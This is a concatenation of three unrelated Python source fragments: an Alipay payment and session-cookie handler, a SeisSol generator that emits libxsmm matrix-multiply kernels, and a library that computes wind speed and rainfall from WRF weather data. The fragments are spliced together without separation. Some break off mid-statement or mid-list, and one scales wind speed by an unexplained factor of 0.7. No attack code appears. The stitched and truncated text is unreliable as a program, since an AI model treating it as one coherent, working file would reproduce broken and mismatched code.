            secure = True
        max_age = int(gConfig['authorize_platform']['session']['session_age'])
        cookie = ('Set-Cookie', dump_cookie(key, value, domain=str(gConfig['authorize_platform']['session']['session_domain']), max_age=max_age, secure=secure))
        return cookie

    sid = request.cookies.get('authorize_platform_session_id')
    cookie = None
    is_expire = False
    sess = None
    if sid is None or len(sid)==0:
        # No cookie sent: start a brand new session.
        request.session = session_store.new({})
        #session_store.save(request.session)
        is_expire = True
        cookie = set_cookie('authorize_platform_session_id', request.session.sid )
        sess = request.session
    else:
        request.session = session_store.get(sid)
        if request.session:
            # Known session: refresh the cookie and persist any modifications.
            cookie = set_cookie('authorize_platform_session_id', request.session.sid)
            session_store.save_if_modified(request.session)
        else:
            # Cookie referenced an expired/unknown session: clear it.
            cookie = set_cookie('authorize_platform_session_id', '')
            is_expire = True
        sess = request.session
    return sess, cookie, is_expire

def get_token_from_env(environ):
    """Look up the login token for the request's 'session_id' cookie.

    Returns (session_id, token); either may be None when absent.
    """
    global gConfig, gLoginToken
    cookie = parse_cookie(environ)
    session_id = None
    ret = None
    if cookie.has_key('session_id'):
        session_id = cookie['session_id']
        if gLoginToken.has_key(session_id):
            ret = gLoginToken[session_id]
    return session_id, ret

def get_session_from_env(environ):
    """Return the stored session for the request's 'session_id' cookie, or None."""
    global gSessionStore
    cookie = parse_cookie(environ)
    session_id = None
    ret = None
    if cookie.has_key('session_id'):
        session_id = cookie['session_id']
        ret = gSessionStore.get(session_id)
    return ret

def get_userinfo_from_env(environ):
    """Return (session_id, login token) for the request's cookie.

    NOTE(review): identical body to get_token_from_env — candidates for merging.
    """
    global gConfig, gLoginToken
    cookie = parse_cookie(environ)
    session_id = None
    ret = None
    if cookie.has_key('session_id'):
        session_id = cookie['session_id']
        if gLoginToken.has_key(session_id):
            ret = gLoginToken[session_id]
    return session_id, ret

def get_sign_alipay(sign_data):
    """MD5-sign an Alipay parameter string with the configured partner key."""
    global gConfig
    ret = ''
    text = sign_data + gConfig['pay_platform']['alipay']['partner_key']
    text = enc_by_code(gConfig['pay_platform']['alipay']['input_charset'], text)
    if (gConfig['pay_platform']['alipay']['sign_type']).lower() == 'md5':
        md5.digest_size = 32
        ret = md5.new(text).hexdigest()
    return ret

def check_sign_alipay(input_charset, signature, sign_type, original_data):
    """Verify an Alipay callback signature; True iff the recomputed MD5 matches."""
    global gConfig
    text = original_data + gConfig['pay_platform']['alipay']['partner_key']
    text = enc_by_code(str(input_charset), text)
    ret = ''
    if str(sign_type).lower() == 'md5':
        md5.digest_size = 32
        ret = md5.new(text).hexdigest()
    return ret == str(signature)

def build_query_string(data={}):
    """Join a dict as 'k1=v1&k2=v2...' with keys in sorted order (no URL escaping).

    NOTE(review): mutable default argument and O(n^2) keys.index() per loop
    iteration — harmless here (data is never mutated), but worth cleaning up.
    """
    ret = ''
    keys = data.keys()
    keys.sort()
    for k in keys:
        ret += '%s=%s' % (k, data[k])
        if keys.index(k) < len(keys) - 1:
            ret += '&'
    return ret

def get_pay_record_by_id(querydict):
    """Fetch the pay_log mongo document matching querydict['out_trade_no'].

    Only the 'alipay' channel is handled; returns None otherwise or when the
    pay_log collection / record does not exist.
    """
    ret = None
    if querydict['pay_channel'] == 'alipay':
        out_trade_no = querydict['out_trade_no']
        db_util.mongo_init_client('pay_platform')
        client = db_util.gClientMongo['pay_platform']
        db = client['pay']
        if 'pay_log' in db.collection_names(False):
            collection = db['pay_log']
            ret = collection.find_one({"out_trade_no":out_trade_no})
    return ret

def refund_alipay(querydict):
    """Queue an Alipay refund request for the trade in querydict.

    Validates the original pay record, builds the signed refund parameters and
    enqueues them on gJoinableQueue for asynchronous submission.
    (Definition continues past this view — truncated here.)
    """
    global ENCODING
    global gConfig, gSecurityConfig, gJoinableQueue
    headers = {}
    headers['Content-Type'] = 'text/json;charset=' + ENCODING
    statuscode = '200 OK'
    body = ''
    href = str(gConfig['pay_platform']['alipay']['submit_gateway'])
    sign_data = {}
    sign_data['_input_charset'] = gConfig['pay_platform']['alipay']['input_charset']
    sign_data['partner'] = gConfig['pay_platform']['alipay']['partner_id']
    sign_data['service'] = 'refund_fastpay_by_platform_pwd'
    sign_data['refund_date'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    # Unique batch id: date prefix plus a fresh Mongo ObjectId.
    sign_data['batch_no'] = datetime.datetime.now().strftime("%Y%m%d") + str(ObjectId())
    sign_data['batch_num'] = '1'
    querydict['refund_date'] = sign_data['refund_date']
    querydict['batch_no'] = sign_data['batch_no']
    querydict['batch_num'] = int(sign_data['batch_num'])
    if len(gConfig['pay_platform']['alipay']['return_url'])>0:
        sign_data['return_url'] = gConfig['pay_platform']['alipay']['return_url']
    if len(gConfig['pay_platform']['alipay']['error_notify_url'])>0:
        sign_data['error_notify_url'] = gConfig['pay_platform']['alipay']['error_notify_url']
    if len(gConfig['pay_platform']['alipay']['notify_url'])>0:
        sign_data['notify_url'] = gConfig['pay_platform']['alipay']['notify_url']
    rec = get_pay_record_by_id(querydict)
    if rec:
        if rec.has_key('error_code'):
            # Original payment failed — refuse to refund it.
            body = json.dumps({'result':'refund_fail_pay_has_fail' }, ensure_ascii=True, indent=4)
        else:
            if rec.has_key('seller_email') \
                and rec.has_key('trade_no') :
                trade_no = rec['trade_no']
                sign_data['seller_email'] = rec['seller_email']
                querydict['seller_email'] = sign_data['seller_email']
                querydict['trade_no'] = trade_no
                # Alipay batch refund detail: trade_no^amount^reason.
                detail_data = '%s^%.2f^%s' % (trade_no, float(querydict['refund_fee']), querydict['refund_desc'] )
                sign_data['detail_data'] = detail_data
            if not rec.has_key('seller_email'):
                body = json.dumps({'result':'refund_fail_seller_email_required' }, ensure_ascii=True, indent=4)
            if not rec.has_key('trade_no'):
                body = json.dumps({'result':'refund_fail_trade_no_required' }, ensure_ascii=True, indent=4)
    else:
        body = json.dumps({'result':'refund_fail_pay_trade_not_found:%s' % querydict['out_trade_no']}, ensure_ascii=True, indent=4)
    if len(body) == 0:
        # No validation error so far: log the refund attempt and enqueue it.
        #querydict['refund_result'] = 'refund_sending_to_alipay'
        querydict['refund_result'] = 'refund_adding_to_queue'
        querydict['refund_fee'] = float(querydict['refund_fee'])
        g = gevent.spawn(update_refund_log, querydict['out_trade_no'], querydict)
        #g1 = sign_and_send_alipay('post', href, sign_data)
        #g1.join()
        #resp = g1.value
        #s = resp.read()
        #print('refund response: [%s]' % dec(s))
        #body = json.dumps({'result':'refund_sending_to_alipay'}, ensure_ascii=True, indent=4)
        try:
            gJoinableQueue.put({'thirdpay':'alipay', 'method':'post', 'url':href, 'data':sign_data})
        except gevent.queue.Full:
            body
## # @file # This file is part of SeisSol. # # @author <NAME> (c.uphoff AT tum.de, http://www5.in.tum.de/wiki/index.php/Carsten_Uphoff,_M.Sc.) # # @section LICENSE # Copyright (c) 2015, SeisSol Group # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
#
# @section DESCRIPTION
#
# Code generator glue: emits libxsmm GEMM routines, kernel wrappers, flop
# counters and matrix initializers for SeisSol.

import Code
import Kernel
import os
import itertools
import re
import tempfile
import scipy.io
import scipy.sparse
import inspect

def generateRoutineName(gemm):
  """Build the unique C routine name encoding all GEMM shape/layout parameters."""
  # Sparse kernels are named after the sparse matrix; dense ones are plain 'gemm'.
  name = 'sparse_' + gemm['spMtxName'] if gemm['spp'] is not None else 'gemm'
  # A non-positive leading dimension marks the sparse operand.
  lda = 'Asparse' if gemm['LDA'] <= 0 else 'ldA{}'.format(gemm['LDA'])
  ldb = 'Bsparse' if gemm['LDB'] <= 0 else 'ldB{}'.format(gemm['LDB'])
  return '{}_m{}_n{}_k{}_{}_{}_ldC{}_beta{}_alignedA{}_alignedC{}_{}'.format(
    name,
    gemm['M'],
    gemm['N'],
    gemm['K'],
    lda,
    ldb,
    gemm['LDC'],
    gemm['beta'],
    gemm['alignedA'],
    gemm['alignedC'],
    gemm['prefetch']
  )

def formatOffset(name, offset):
  """Return a C expression for 'name' advanced by 'offset' elements ('&name[off]')."""
  if offset == 0:
    return name
  else:
    return '&{}[{}]'.format(name, offset)

def functionName(name):
  """Split a kernel name of the form 'base[index]' into its parts.

  Returns (functionName, base, index); index is -1 for plain (non-indexed) names.
  """
  brackets = re.match(r'^(\w+)\[(\d+)\]$', name)
  if brackets != None:
    # 'base[7]' -> function 'base7', base 'base', index 7.
    functionName = brackets.expand(r'\1\2')
    base = brackets.group(1)
    index = int(brackets.group(2))
    if index < 0:
      raise ValueError('Invalid name {}. Index must be greater than 0.'.format(name))
  else:
    functionName = name
    base = name
    index = -1
  return (functionName, base, index)

class Generator:
  """Drives generation of GEMM routines, kernels and initializers for one matrix db."""

  def __init__(self, db, libxsmmGenerator, architecture, prefix=''):
    # db: matrix database; libxsmmGenerator: path to the libxsmm generator
    # binary; architecture: target description; prefix: filename/guard prefix.
    self.db = db
    self.libxsmmGenerator = libxsmmGenerator
    self.architecture = architecture
    self.prefix = prefix

  def __generateGemms(self, outputDir, gemmlist):
    """Emit <prefix>gemms.cpp/.h and invoke libxsmm for each unique GEMM routine."""
    cppFilename = '{}/{}gemms.cpp'.format(outputDir,self.prefix)
    hFilename = '{}/{}gemms.h'.format(outputDir,self.prefix)
    with Code.Cpp(cppFilename) as cpp:
      cpp('#ifndef NDEBUG')
      cpp('extern long long libxsmm_num_total_flops;')
      cpp('#endif')
      cpp('#if defined( __SSE3__) || defined(__MIC__)')
      cpp('#include <immintrin.h>')
      cpp('#endif')
    with Code.Cpp(hFilename) as header:
      with header.HeaderGuard(self.prefix.upper() + 'GEMMS'):
        # Deduplicate by routine name: sort then groupby keeps one (index, name)
        # representative per distinct routine.
        indexnamelist = [(i, generateRoutineName(gemm)) for i, gemm in enumerate(gemmlist)]
        keyFunc = lambda x: x[1]
        indexnamelist.sort(key=keyFunc)
        uniqueindexnames = [group.next() for key, group in itertools.groupby(indexnamelist, key=keyFunc)]
        for index, name in uniqueindexnames:
          header('void {name}({tn} const* A, {tn} const* B, {tn}* C, {tn} const* A_prefetch, {tn} const* B_prefetch, {tn} const* C_prefetch);'.format( name=name, tn=self.architecture.typename ))
          spp = gemmlist[index]['spp']
          if spp is not None:
            # Write the sparsity pattern to a temp MatrixMarket file for libxsmm.
            temp = tempfile.NamedTemporaryFile()
            # symmetry was introduced in scipy 0.17.0
            if 'symmetry' in inspect.getargspec(scipy.io.mmwrite).args:
              scipy.io.mmwrite(temp, scipy.sparse.coo_matrix(spp).asformat('csc'), symmetry='general')
            else:
              scipy.io.mmwrite(temp, scipy.sparse.coo_matrix(spp).asformat('csc'))
            sppFile = temp.name
          else:
            sppFile = ''
          os.system(self.__generateLibxsmmGeneratorCall(cppFilename, gemmlist[index], sppFile))

  def __generateLibxsmmGeneratorCall(self, filename, gemm, sppFile):
    """Assemble the shell command line for the libxsmm generator binary."""
    return '{} {} {} {} {} {} {} {} {} {} {} {} {} {} {} {} {}P {}'.format(
      self.libxsmmGenerator,
      gemm['type'],
      filename,
      generateRoutineName(gemm),
      gemm['M'],
      gemm['N'],
      gemm['K'],
      gemm['LDA'],
      gemm['LDB'],
      gemm['LDC'],
      gemm['alpha'],
      gemm['beta'],
      gemm['alignedA'],
      gemm['alignedC'],
      self.architecture.name,
      gemm['prefetch'],
      self.architecture.precision,
      sppFile
    )

  def __gemmSignature(self, names, writeNames=True):
    """Render a C parameter list for the given matrices; the result matrix is non-const."""
    if writeNames:
      signature = ', '.join(['{}{}* {}'.format(self.architecture.typename, ' const' if name != Kernel.Kernel.ResultName else '', name) for name in names])
    else:
      signature = ', '.join(['{}{}*'.format(self.architecture.typename, ' const' if name != Kernel.Kernel.ResultName else '') for name in names])
    return signature

  def __localArray(self, name, reals, aligned=True):
    """Declare a stack-local scratch array, page-aligned by default."""
    aligned = ' __attribute__((aligned(PAGESIZE_STACK)))' if aligned else ''
    return '{} {}[{}]{};\n'.format(self.architecture.typename, name, reals, aligned)

  def generateKernels(self, outputDir, kernels):
    """Emit <prefix>kernels.h/.cpp and <prefix>flops.h for all kernel prototypes."""
    luts = dict()          # base name -> {index: base} for indexed kernel pointer tables
    signatures = dict()    # base name -> C signature (types only)
    flops = dict()         # kernel/base -> (nonZero, hardware) flop counts
    generatedKernels = list()
    gemmlist = list()
    for prototype in kernels:
      gk = Kernel.GeneratedKernel(prototype, self.db, self.architecture)
      flop = (gk.nonZeroFlops, gk.hardwareFlops)
      funName, base, index = functionName(prototype.name)
      if index >= 0:
        # Indexed kernel ('base[i]'): collect into per-base lookup tables.
        if not luts.has_key(base):
          luts[base] = dict()
          signatures[base] = self.__gemmSignature(gk.involvedMatrices, writeNames=False)
        luts[base].update({index: base})
        if not flops.has_key(base):
          flops[base] = dict()
        flops[base].update({index: flop})
      else:
        flops[funName] = flop
      generatedKernels.append( (funName, gk) )
      gemmlist.extend([op['gemm'] for op in gk.operations if op.has_key('gemm')])
    self.__generateGemms(outputDir, gemmlist)
    with Code.Cpp('{}/{}kernels.h'.format(outputDir, self.prefix)) as header:
      with header.HeaderGuard(self.prefix.upper() + 'KERNELS'):
        with header.Namespace('seissol'):
          with header.Namespace('generatedKernels'):
            for name, gk in generatedKernels:
              header('void {}({});'.format(name, self.__gemmSignature(gk.involvedMatrices)))
            # Function-pointer tables for indexed kernels; missing indices get 0.
            for key, value in luts.iteritems():
              maxkey = max(value.keys())
              pointers = [value[i] + str(i) if value.has_key(i) else '0' for i in range(0, maxkey+1)]
              header('static void (* const {}[])({}) = {{ {} }};'.format(key, signatures[key], ', '.join(pointers)))
    with Code.Cpp('{}/{}kernels.cpp'.format(outputDir, self.prefix)) as cpp:
      cpp.includeSys('cstring')
      cpp.includeSys('Initializer/preProcessorMacros.fpp')
      cpp.include(self.prefix + 'gemms.h')
      with cpp.Namespace('seissol'):
        with cpp.Namespace('generatedKernels'):
          for name, gk in generatedKernels:
            with cpp.Function('void {}({})'.format(name, self.__gemmSignature(gk.involvedMatrices))):
              for temp in gk.temps:
                cpp(self.__localArray(temp.name, temp.requiredReals))
              for operation in gk.operations:
                if operation['type'] == Kernel.Operation.MEMSET:
                  cpp.memset(operation['pointer'], operation['numberOfReals'], operation['dataType'], operation['offset'])
                elif operation['type'] == Kernel.Operation.GEMM:
                  prefetch = formatOffset(operation['gemm']['prefetchPointer'], operation['offsetC']) if operation['gemm'].has_key('prefetchPointer') else 'NULL'
                  cpp('{}({}, {}, {}, NULL, {}, NULL);'.format(
                    generateRoutineName(operation['gemm']),
                    formatOffset(operation['nameA'], operation['offsetA']),
                    formatOffset(operation['nameB'], operation['offsetB']),
                    formatOffset(operation['nameC'], operation['offsetC']),
                    prefetch
                  ))
    with Code.Cpp('{}/{}flops.h'.format(outputDir, self.prefix)) as header:
      with header.HeaderGuard(self.prefix.upper() + 'FLOPS'):
        with header.Namespace('seissol'):
          with header.Namespace('flops'):
            for key, value in flops.iteritems():
              if isinstance(value, dict):
                # Indexed kernels: one counter array per base, gaps filled with 0.
                maxkey = max(value.keys())
                nonZeroFlops = [str(value[i][0]) if value.has_key(i) else '0' for i in range(0, maxkey+1)]
                header('unsigned const {}_nonZero[] = {{ {} }};'.format(key, ', '.join(nonZeroFlops)))
                hardwareFlops = [str(value[i][1]) if value.has_key(i) else '0' for i in range(0, maxkey+1)]
                header('unsigned const {}_hardware[] = {{ {} }};'.format(key, ', '.join(hardwareFlops)))
              else:
                header('unsigned const {}_nonZero = {};'.format(key, value[0]))
                header('unsigned const {}_hardware = {};'.format(key, value[1]))

  def generateInitializer(self, outputDir):
    """Emit <prefix>sizes.h, <prefix>init.h and <prefix>init.cpp for all matrices.

    (Definition continues past this view — truncated here.)
    """
    # Collect constant global matrices per group, indexed by globalMatrixId.
    globalMatrixValues = dict()
    maxGlobalMatrixId = dict()
    for matrixInfo in self.db.itervalues():
      if matrixInfo.isConstantGlobalMatrix:
        group = matrixInfo.globalMatrixGroup
        if not globalMatrixValues.has_key(group):
          globalMatrixValues[group] = dict()
          maxGlobalMatrixId[group] = -1
        globalMatrixValues[group][matrixInfo.globalMatrixId] = matrixInfo.name
        maxGlobalMatrixId[group] = max(maxGlobalMatrixId[group], matrixInfo.globalMatrixId)
    # Prefix-sum of storage sizes gives each matrix's offset in the packed buffer.
    globalMatrixOffsets = dict()
    for group in globalMatrixValues.keys():
      globalMatrixOffsets[group] = [0]
      for i in range(0, maxGlobalMatrixId[group]+1):
        offset = self.db[globalMatrixValues[group][i]].requiredReals if globalMatrixValues[group].has_key(i) else 0
        globalMatrixOffsets[group].append(globalMatrixOffsets[group][-1] + offset)
    with Code.Cpp('{}/{}sizes.h'.format(outputDir, self.prefix)) as header:
      with header.HeaderGuard(self.prefix.upper() + 'SIZES'):
        with header.Namespace('seissol'):
          with header.Namespace('model'):
            for matrixInfo in self.db.itervalues():
              with header.Namespace(matrixInfo.name):
                header('unsigned const rows = {};'.format(matrixInfo.rows))
                header('unsigned const cols = {};'.format(matrixInfo.cols))
                header('unsigned const reals = {};'.format(matrixInfo.requiredReals))
                if len(matrixInfo.blocks) == 1 and matrixInfo.blocks[0].ld > 0:
                  header('unsigned const ld = {};'.format(matrixInfo.blocks[0].ld))
    hFilename = self.prefix + 'init.h'
    with Code.Cpp(outputDir + '/' + hFilename) as header:
      with header.HeaderGuard(self.prefix.upper() + 'INIT'):
        header.includeSys('cstring')
        with header.Namespace('seissol'):
          with header.Namespace('model'):
            for matrixInfo in self.db.itervalues():
              with header.Namespace(matrixInfo.name):
                if not matrixInfo.isConstantGlobalMatrix:
                  # Runtime matrices: declare conversion plus inline index/setZero helpers.
                  header('void convertToDense({typename} const* matrix, {typename}* denseMatrix);'.format(typename=self.architecture.typename))
                  with header.Function('static inline int index(unsigned row, unsigned column)'):
                    header('static int const lut[] = {{ {} }};'.format( ', '.join(map(str, matrixInfo.getIndexLUT())) ))
                    header('return lut[row + column*{}];'.format(matrixInfo.rows))
                  with header.Function('static inline void setZero({}* data)'.format(self.architecture.typename)):
                    header.memset('data', matrixInfo.requiredReals, self.architecture.typename)
                else:
                  # Constant matrices: values are baked into the binary.
                  header('extern {} const values[];'.format(self.architecture.typename))
                  with header.Function('static inline void convertToDense({typename}* denseMatrix)'.format(typename=self.architecture.typename)):
                    header('static {} const denseValues[] = {{ {} }};'.format( self.architecture.typename, ', '.join(matrixInfo.getValuesDense()) ))
                    header('memcpy(denseMatrix, denseValues, {reals} * sizeof({typename}));'.format(reals=matrixInfo.rows*matrixInfo.cols, typename=self.architecture.typename))
            for group in globalMatrixValues.keys():
              prefix = group + '_' if len(group) > 0 else ''
              header('extern {} const*const {}globalMatrixValues[];'.format(self.architecture.typename, prefix))
              header('extern unsigned const {}globalMatrixOffsets[];'.format(prefix))
              header('unsigned const {}numGlobalMatrices = {};'.format(prefix, maxGlobalMatrixId[group]+1))
    with Code.Cpp('{}/{}init.cpp'.format(outputDir, self.prefix)) as cpp:
      cpp.include(hFilename)
      with cpp.Namespace('seissol'):
        with cpp.Namespace('model'):
          for matrixInfo in self.db.itervalues():
            if not matrixInfo.isConstantGlobalMatrix:
              with cpp.Function('void {namespace}::convertToDense({typename} const* matrix, {typename}* denseMatrix)'.format(namespace=matrixInfo.name, typename=self.architecture.typename)):
                cpp.memset('denseMatrix', matrixInfo.rows * matrixInfo.cols, self.architecture.typename)
                for block in matrixInfo.blocks:
                  with cpp.For('unsigned col = {block.startcol}; col < {block.stopcol}; ++col'.format(block=block)):
                    with cpp.For('unsigned row = {block.startrow} + {block.startpaddingrows}; row < {block.stoprow}; ++row'.format(block=block)):
                      if block.sparse:
                        # Sparse block: look up the packed index; -1 means structural zero.
                        cpp('int idx = index(row, col);')
                        with cpp.If('idx != -1'):
                          cpp('denseMatrix[col * {matrixInfo.rows} + row] = matrix[idx];'.format(matrixInfo=matrixInfo))
                      else:
                        cpp('denseMatrix[col * {matrixInfo.rows} + row] = matrix[{block.offset} + (col - {block.startcol}) * {block.ld} + (row - {block.startrow})];'.format( matrixInfo=matrixInfo, block=block ))
            else:
              cpp('{} const {}::values[] = {{ {} }};'.format( self.architecture.typename, matrixInfo.name, ', '.join(matrixInfo.getValuesAsStoredInMemory()) ))
          for group in globalMatrixValues.keys():
            prefix = group + '_' if len(group) > 0 else ''
            cpp('{} const*const {}globalMatrixValues[] = {{ {} }};'.format(
              self.architecture.typename,
              prefix,
              ', '.join(['&' + globalMatrixValues[group][i] + '::values[0]' if globalMatrixValues[group].has_key(i) else 'NULL' for i in
<gh_stars>0
"""
Library Features:

Name:          lib_wrf_variables
Author(s):     <NAME> (<EMAIL>)
Date:          '20210522'
Version:       '1.1.0'
"""
#######################################################################################
# Library
import logging

import numpy as np
import pandas as pd

from src.hyde.algorithm.io.nwp.wrf.lib_wrf_io_generic import reshape_var3d, create_darray_3d
from src.hyde.algorithm.settings.nwp.wrf.lib_wrf_args import logger_name

# Logging
log_stream = logging.getLogger(logger_name)

# Debug
# import matplotlib.pylab as plt
#######################################################################################


# -------------------------------------------------------------------------------------
# Method to define variable attribute(s)
def getVarAttributes(var_attrs_in):
    """Merge a list of attribute dicts into one dict.

    Values that differ across the input dicts are collected into a de-duplicated
    list; single-valued attributes collapse back to scalars.
    """
    var_attrs_tmp = {}
    for var_attrs_step in var_attrs_in:
        for var_attr_key, var_attr_value in var_attrs_step.items():
            if var_attr_key not in list(var_attrs_tmp.keys()):
                var_attrs_tmp[var_attr_key] = var_attr_value
            else:
                # Key seen before: accumulate both values, flattening one level
                # of nesting, then drop duplicates.
                var_attr_tmp = var_attrs_tmp[var_attr_key]
                var_attr_list = [var_attr_tmp, var_attr_value]
                var_attr_list_filter = []
                for var_attr_step in var_attr_list:
                    if isinstance(var_attr_step, list):
                        var_attr_step = var_attr_step[0]
                    var_attr_list_filter.append(var_attr_step)
                var_attr_list = list(set(var_attr_list_filter))
                var_attrs_tmp[var_attr_key] = var_attr_list
    # Collapse singleton lists back to scalar values.
    var_attr_out = {}
    for var_attr_key, var_attr_value in var_attrs_tmp.items():
        if isinstance(var_attr_value, list) and var_attr_value.__len__() == 1:
            var_attr_out[var_attr_key] = var_attr_value[0]
        else:
            var_attr_out[var_attr_key] = var_attr_value
    return var_attr_out
# -------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------
# Method to compute WindSpeed
def computeWindSpeed(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None,
                     var_units=None, var_step_type=None):
    """Compute wind speed from the u/v components in var_dset.

    var_name holds three names: u component, v component, and the output speed
    variable. Returns a dataset containing both components plus the speed.
    Raises IOError on unexpected units, step type or mismatched shapes.
    """
    # Set args
    if var_step_type is None:
        var_step_type = ['instant']
    if var_units is None:
        var_units = ['m s**-1']
    if var_geo_y is None:
        var_geo_y = ['latitude']
    if var_geo_x is None:
        var_geo_x = ['longitude']
    if var_time is None:
        var_time = ['valid_time']

    # Parse args
    var_name_1 = list(var_name)[0]
    var_name_2 = list(var_name)[1]
    var_name_3 = list(var_name)[2]
    var_units = var_units[0]
    var_step_type = var_step_type[0]
    var_time = var_time[0]
    var_geo_x = var_geo_x[0]
    var_geo_y = var_geo_y[0]

    # Get values
    var_da_in_1 = var_dset[var_name_1]
    var_values_in_1 = var_da_in_1.values
    var_dims_in_1 = var_da_in_1.dims
    var_da_in_2 = var_dset[var_name_2]
    var_values_in_2 = var_da_in_2.values
    var_dims_in_2 = var_da_in_2.dims

    var_time = var_dset[var_name_1][var_time]
    var_geo_x = var_dset[var_name_1][var_geo_x]
    var_geo_y = var_dset[var_name_1][var_geo_y]

    # Move a leading time/step axis to the trailing position so the layout
    # is (y, x, time).
    var_time_str_1 = var_dims_in_1[0].lower()
    if (var_time_str_1 == 'step') or (var_time_str_1 == 'time'):
        var_values_in_1 = reshape_var3d(var_values_in_1)
    var_shape_in_1 = var_values_in_1.shape
    var_time_str_2 = var_dims_in_2[0].lower()
    if (var_time_str_2 == 'step') or (var_time_str_2 == 'time'):
        var_values_in_2 = reshape_var3d(var_values_in_2)
    var_shape_in_2 = var_values_in_2.shape

    # Check attributes
    if not (var_units == 'm s-1') and not (var_units == 'm s**-1'):
        log_stream.error(' ===> Wind components units are not allowed! Check your data!')
        raise IOError('Data units is not allowed!')
    if not (var_step_type == 'instant') and not (var_step_type == 'instantaneous'):
        log_stream.error(' ===> Wind components allowed only in instantaneous format! Check your data!')
        raise IOError('Data type is not allowed!')

    if not var_shape_in_1 == var_shape_in_2:
        log_stream.error(' ===> Wind dimensions are not the same! Check your data!')
        raise IOError('Data dimensions are not allowed!')
    else:
        var_shape_in = list({var_shape_in_1, var_shape_in_2})[0]

    var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]])
    var_values_out[:, :, :] = np.nan
    for var_step in range(0, var_shape_in[2]):
        var_values_step_1 = var_values_in_1[:, :, var_step]
        var_values_step_2 = var_values_in_2[:, :, var_step]
        # NOTE(review): the 0.7 factor scales the vector magnitude — presumably
        # an empirical height/exposure correction; confirm against model docs.
        var_values_out[:, :, var_step] = np.sqrt(var_values_step_1 ** 2 + var_values_step_2 ** 2) * 0.7

    var_da_in_1 = create_darray_3d(var_values_in_1, var_time, var_geo_x, var_geo_y,
                                   dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude',
                                   dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time',
                                   dims_order=['latitude', 'longitude', 'time'])
    var_da_in_2 = create_darray_3d(var_values_in_2, var_time, var_geo_x, var_geo_y,
                                   dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude',
                                   dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time',
                                   dims_order=['latitude', 'longitude', 'time'])
    var_da_out = create_darray_3d(var_values_out, var_time, var_geo_x, var_geo_y,
                                  dim_key_time='time', dim_key_x='longitude', dim_key_y='latitude',
                                  dim_name_x='longitude', dim_name_y='latitude', dim_name_time='time',
                                  dims_order=['latitude', 'longitude', 'time'])

    # Bundle components and derived speed into one dataset.
    var_dset_out = var_da_in_1.to_dataset(name=var_name_1)
    var_dset_out[var_name_2] = var_da_in_2
    var_dset_out[var_name_3] = var_da_out

    return var_dset_out
# -------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------
# Method to compute WindSpeed
def computeRain(var_dset, var_name, var_time=None, var_geo_x=None, var_geo_y=None,
                var_units=None, var_step_type=None):
    """De-accumulate rain: convert cumulative totals into per-step amounts in mm.

    Accepts accumulated fields in 'm' (scaled by 1000) or 'mm'/'kg m**-2';
    negative step differences are clamped to zero.
    """
    # Set args
    if var_step_type is None:
        var_step_type = ['accum']
    if var_units is None:
        var_units = ['m']
    if var_geo_y is None:
        var_geo_y = ['latitude']
    if var_geo_x is None:
        var_geo_x = ['longitude']
    if var_time is None:
        var_time = ['valid_time']

    # Parse args
    var_name = list(var_name)[0]
    var_units = var_units[0]
    var_step_type = var_step_type[0]
    var_time = var_time[0]
    var_geo_x = var_geo_x[0]
    var_geo_y = var_geo_y[0]

    # Get values
    var_da_in = var_dset[var_name]
    var_values_in = var_da_in.values
    var_dims_in = var_da_in.dims
    var_time = var_dset[var_time]
    var_geo_x = var_dset[var_geo_x]
    var_geo_y = var_dset[var_geo_y]

    # kg m**-2 of water is numerically equivalent to mm of rain.
    if (var_units == 'kg m**-2') or (var_units == 'Kg m**-2'):
        var_units = 'mm'

    if var_units == 'm':
        var_scale_factor = 1000
    elif var_units == 'mm':
        var_scale_factor = 1
    else:
        log_stream.error(' ===> Rain components units are not allowed! Check your data!')
        raise IOError('Selected units are not allowed!')

    # Move a leading time/step axis to the trailing position (y, x, time).
    var_time_str = var_dims_in[0].lower()
    if (var_time_str == 'step') or (var_time_str == 'time'):
        var_values_in = reshape_var3d(var_values_in)
    var_shape_in = var_values_in.shape

    # Check attributes
    if not (var_units == 'mm') and not (var_units == 'm'):
        log_stream.error(' ===> Rain components units are not allowed! Check your data!')
        raise IOError('Data units is not allowed!')
    if not (var_step_type == 'accum') and not (var_step_type == 'accumulated'):
        log_stream.error(' ===> Rain components allowed only in accumulated format! Check your data!')
        raise IOError('Data type is not allowed!')

    # First step is taken as-is; later steps are differences of the
    # accumulated field, clamped at zero.
    var_values_step_start = None
    var_values_out = np.zeros([var_shape_in[0], var_shape_in[1], var_shape_in[2]])
    var_values_out[:, :, :] = np.nan
    for var_step in range(0, var_shape_in[2]):
        var_values_step_tmp = var_values_in[:, :, var_step]
        if var_values_step_start is None:
            var_values_step_end = var_values_step_tmp
